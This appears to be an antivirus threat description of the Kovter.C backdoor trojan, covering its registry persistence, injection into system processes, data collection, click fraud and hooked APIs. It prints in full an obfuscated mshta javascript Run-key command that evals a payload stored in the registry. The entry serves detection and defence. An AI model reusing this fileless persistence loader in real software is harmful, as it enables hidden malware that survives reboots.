Win32/Kovter [Threat Name] go to Threat

Win32/Kovter.C [Threat Variant Name]

Category trojan
Size 311860 B
Detection created May 23, 2015
Signature database version 11674
Aliases Trojan.Win32.Kovter.kj (Kaspersky)
  Trojan.MulDrop6.7552 (Dr.Web)
  TR/Kovter.311854 (Avira)
Short description

The trojan serves as a backdoor. It can be controlled remotely.

Short description

The following Registry entries are set:

  • [HKEY_LOCAL_MACHINE\­SOFTWARE\­Microsoft\­Windows\­CurrentVersion\­Run]
    • "0x9a352a44" = "mshta javascript:Wwc4UYPy="q3bAi0T";p3a=new%20ActiveXObject("WScript.Shell");Y5VbU4ym="6fGo";Vuy24U=p3a.RegRead("HKLM\­\­software\­\­%variable1%\­\­%variable2%");yj2AV2YXX="4iWRAuYOY";eval(Vuy24U);QIb3FlghU="tU6";"
  • [HKEY_CURRENT_USER\­SOFTWARE\­Microsoft\­Windows\­CurrentVersion\­Run]
    • "0x9a352a44" = "mshta javascript:Wwc4UYPy="q3bAi0T";p3a=new%20ActiveXObject("WScript.Shell");Y5VbU4ym="6fGo";Vuy24U=p3a.RegRead("HKCU\­\­software\­\­%variable1%\­\­%variable2%");yj2AV2YXX="4iWRAuYOY";eval(Vuy24U);QIb3FlghU="tU6";"
  • [HKEY_LOCAL_MACHINE\­Microsoft\­Windows\­CurrentVersion\­Policies\­Explorer\­Run]
    • "0x9a352a44" = "mshta javascript:Wwc4UYPy="q3bAi0T";p3a=new%20ActiveXObject("WScript.Shell");Y5VbU4ym="6fGo";Vuy24U=p3a.RegRead("HKLM\­\­software\­\­%variable1%\­\­%variable2%");yj2AV2YXX="4iWRAuYOY";eval(Vuy24U);QIb3FlghU="tU6";"
  • [HKEY_CURRENT_USER\­Microsoft\­Windows\­CurrentVersion\­Policies\­Explorer\­Run]
    • "0x9a352a44" = "mshta javascript:Wwc4UYPy="q3bAi0T";p3a=new%20ActiveXObject("WScript.Shell");Y5VbU4ym="6fGo";Vuy24U=p3a.RegRead("HKCU\­\­software\­\­%variable1%\­\­%variable2%");yj2AV2YXX="4iWRAuYOY";eval(Vuy24U);QIb3FlghU="tU6";"
  • [HKEY_LOCAL_MACHINE\­SOFTWARE\­%variable1%]
    • "%variable2%" = "%javascriptpayload%"
    • "%variable3%" = "%malwarepayload%"
  • [HKEY_CURRENT_USER\­SOFTWARE\­%variable1%]
    • "%variable2%" = "%javascriptpayload%"
    • "%variable3%" = "%malwarepayload%"

This causes the trojan to be executed on every system start.


The trojan may create copies of itself using the following filenames:

  • %localappdata%\­%variable4%\­%variable4%.exe
  • %appdata%\­%variable4%\­%variable4%.exe
  • %windows%\­%variable4%\­%variable4%.exe
  • %commonappdata%\­Microsoft\­%variable4%\­%variable4%.exe

A string with variable content is used instead of %variable1-4% .


The trojan may set the following Registry entries:

  • [HKEY_LOCAL_MACHINE\­SOFTWARE\­Microsoft\­Windows\­CurrentVersion\­Run]
    • "0x9a352a44" = "%malwareinstallpath%"
  • [HKEY_CURRENT_USER\­SOFTWARE\­Microsoft\­Windows\­CurrentVersion\­Run]
    • "0x9a352a44" = "%malwareinstallpath%"
  • [HKEY_LOCAL_MACHINE\­Microsoft\­Windows\­CurrentVersion\­Policies\­Explorer\­Run]
    • "0x9a352a44" = "%malwareinstallpath%"
  • [HKEY_CURRENT_USER\­Microsoft\­Windows\­CurrentVersion\­Policies\­Explorer\­Run]
    • "x9a352a44" = "%malwareinstallpath%"

This causes the trojan to be executed on every system start.


After the installation is complete, the trojan deletes the original executable file.


The trojan launches the following processes:

  • regsvr32.exe
  • %windir%\­System32\­regsvr32.exe
  • rundll32.exe
  • %windir%\­System32\­rundll32.exe
  • explorer.exe
  • %windir%\­explorer.exe
  • %malwarefilepath%

The trojan creates and runs a new thread with its own code within these running processes.


The following Registry entries are set:

  • [HKEY_CURRENT_USER\­Software\­Microsoft\­Windows\­CurrentVersion\­Internet Settings\­Zones\­3]
    • "1206" = 0
    • "1809" = 3
    • "2300" = 0
  • [HKEY_CURRENT_USER\­Software\­Microsoft\­Windows\­CurrentVersion\­Internet Settings\­Zones\­1]
    • "1206" = 0
    • "1809" = 3
    • "2300" = 0
  • [HKEY_CURRENT_USER\­SOFTWARE\­Microsoft\­Internet Explorer\­Main\­FeatureControl\­FEATURE_BROWSER_EMULATION]
    • "%malwarefilename%" = 8888
    • "iexplore.exe" = 8888
  • [HKEY_LOCAL_MACHINE\­SOFTWARE\­Microsoft\­Internet Explorer\­Main\­FeatureControl\­FEATURE_BROWSER_EMULATION]
    • "%malwarefilename%" = 8888
    • "iexplore.exe" = 8888
Information stealing

The trojan collects the following information:

  • malware version
  • operating system version
  • information about the operating system and system settings
  • language settings
  • installed antivirus software
  • installed firewall application
  • memory status
  • CPU information
  • list of running processes
  • computer name
  • user name

The trojan attempts to send gathered information to a remote machine.

Other information

The trojan acquires data and commands from a remote computer or the Internet.


The trojan contains a list of (173) URLs. The HTTP protocol is used.


It can execute the following operations:

  • download files from a remote computer and/or the Internet
  • run executable files
  • send gathered information
  • create Registry entries
  • stop itself for a certain time period

The trojan sends HTTP requests to simulate clicks on banner advertisements, to inflate web counter statistics etc.


The trojan keeps various information in the following Registry keys:

  • [HKEY_LOCAL_MACHINE\­SOFTWARE\­%variable%]
  • [HKEY_CURRENT_USER\­SOFTWARE\­%variable%]

A string with variable content is used instead of %variable% .


The trojan hooks the following Windows APIs:

  • CreateProcessAsUserA (advapi32.dll)
  • CreateProcessAsUserW (advapi32.dll)
  • CreateProcessWithLogonA (advapi32.dll)
  • CreateProcessWithLogonW (advapi32.dll)
  • CreateProcessWithTokenA (advapi32.dll)
  • CreateProcessWithTokenW (advapi32.dll)
  • RegSetValueA (advapi32.dll)
  • RegSetValueExA (advapi32.dll)
  • RegSetValueExW (advapi32.dll)
  • RegSetValueW (advapi32.dll)
  • DirectSoundCreate (dsound.dll)
  • DirectSoundCreate8 (dsound.dll)
  • RectVisible (gdi32.dll)
  • CreateProcessA (kernel32.dll)
  • CreateProcessW (kernel32.dll)
  • OpenProcess (kernel32.dll)
  • WinExec (kernel32.dll)
  • NtOpenProcess (ntdll.dll)
  • NtResumeThread (ntdll.dll)
  • NtCreateProcess (ntdll.dll)
  • NtCreateProcessEx (ntdll.dll)
  • NtSetValueKey (ntdll.dll)
  • CoCreateInstance (ole32.dll)
  • CoCreateInstanceEx (ole32.dll)
  • CoGetClassObject (ole32.dll)
  • SHGetFolderPathW (shell32.dll)
  • SHGetKnownFolderPath (shell32.dll)
  • ShellExecuteA (shell32.dll)
  • ShellExecuteExA (shell32.dll)
  • ShellExecuteExW (shell32.dll)
  • ShellExecuteW (shell32.dll)
  • DialogBoxIndirectParamA (user32.dll)
  • DialogBoxIndirectParamW (user32.dll)
  • DialogBoxParamW (user32.dll)
  • GetFocus (user32.dll)
  • GetForegroundWindow (user32.dll)
  • MessageBoxA (user32.dll)
  • MessageBoxExA (user32.dll)
  • MessageBoxExW (user32.dll)
  • MessageBoxIndirectA (user32.dll)
  • MessageBoxIndirectW (user32.dll)
  • MessageBoxW (user32.dll)
  • PostMessageA (user32.dll)
  • SetWindowsHookExA (user32.dll)
  • SetWindowsHookExW (user32.dll)
  • WindowFromPoint (user32.dll)
  • waveOutWrite (winmm.dll)
  • HttpOpenRequestA (wininet.dll)
  • HttpOpenRequestW (wininet.dll)
  • InternetConnectA (wininet.dll)
  • InternetConnectW (wininet.dll)
  • InternetReadFile (wininet.dll)
  • getaddrinfo (ws2_32.dll)
  • GetAddrInfoExA (wsock32.dll)
  • GetAddrInfoExW (wsock32.dll)
  • GetAddrInfoW (wsock32.dll)

Please enable Javascript to ensure correct displaying of this content and refresh this page.